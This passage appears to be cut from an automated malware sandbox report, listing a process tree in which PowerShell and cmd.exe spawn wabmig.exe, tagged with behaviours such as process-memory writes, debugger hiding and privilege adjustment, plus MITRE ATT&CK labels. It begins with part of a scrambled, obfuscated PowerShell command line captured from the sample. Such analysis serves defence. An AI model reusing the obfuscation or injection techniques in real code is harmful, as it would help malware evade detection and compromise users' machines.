M dsBa nuWhisbGlazs.albt ArdrBilliP ngnSultgBale(Con,$NtteEHenruF ugf uffo ,ter,ndoiOutfsSerieSvagr kane.randNonfe Str,Pet $ EquLCateoAmbiv xyaSmitsWims)Scyp ');Metonymously $Asmund;"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stolemageren.Luf && echo t"5⤵
- System Location Discovery: System Language Discovery
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
MITRE ATT&CK Enterprise v15
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